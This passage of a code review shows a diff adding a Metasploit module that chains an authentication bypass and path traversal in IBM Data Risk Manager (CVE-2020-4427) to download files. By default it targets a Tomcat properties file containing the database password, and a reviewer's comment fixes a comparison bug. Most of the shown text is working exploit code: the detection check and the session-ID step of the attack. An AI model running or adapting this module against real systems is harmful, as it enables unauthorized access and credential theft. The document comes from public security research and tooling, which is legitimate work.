modules/auxiliary/admin/http/ibm_drm_download.rb

```diff
@@ -0,0 +1,204 @@
+          an unauthenticated attacker to download arbitrary files off the system.
+          The first is an unauthenticated bypass, followed by a path traversal.
+          This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.
+          A downloaded file is zipped, and this module also unzips it before storing it in the database.
+          By default this module downloads Tomcat's application.properties files, which contains the
+          database password, amongst other sensitive data.
+          At the time of disclosure, this is a 0 day. Versions 2.0.3 and 2.0.2 are confirmed to be
+          affected, and the latest 2.0.6 is most likely affected too. Version 2.0.1 is not vulnerable.
+        },
+        'Author' =>
+          [
+            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
+            [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
+            [ 'CVE', '2020-4427' ], # auth bypass
+            [ 'CVE', '2020-4429' ], # insecure default password
+          ],
+        'DisclosureDate' => 'Apr 21 2020'
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 8443]),
+        OptBool.new('SSL', [true, 'Connect with TLS', true]),
+        OptString.new('TARGETURI', [ true, 'Default server path', '/']),
+        OptString.new('FILEPATH', [
+          false, 'Path of the file to download',
+          '/home/a3user/Tomcat/webapps/albatross/WEB-INF/classes/application.properties'
+        ]),
+      ]
+    )
+  end
+
+  def check
+    # at the moment there is no better way to detect AND be stealthy about it
+    session_id = Rex::Text.rand_text_alpha(5..12)
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'saml', 'idpSelection'),
+      'method' => 'GET',
+      'vars_get' => {
+        'id' => session_id,
+        'userName' => 'admin'
+      }
+    })
+    if res && (res.code == 302)
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def create_session_id
+    # step 1: create a session ID and try to make it stick
+    session_id = Rex::Text.rand_text_alpha(5..12)
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'albatross', 'saml', 'idpSelection'),
+      'method' => 'GET',
+      'vars_get' => {
+        'id' => session_id,
+        'userName' => 'admin'
+      }
+    })
+    if res && (res.code = !302)
+      fail_with(Failure::Unknown, "#{peer} - Failed to \"stick\" session ID")
+    else
+      print_good("#{peer} - Successfully \"stickied\" our session ID #{session_id}")
+    end
```

Comment:
```suggestion
    if res && (res.code != 302)
      fail_with(Failure::Unknown, "#{peer} - Failed to \"stick\" session ID")
    end
    
    print_good("#{peer} - Successfully \"stickied\" our session ID #{session_id}")
```

`!=` instead of `= !`.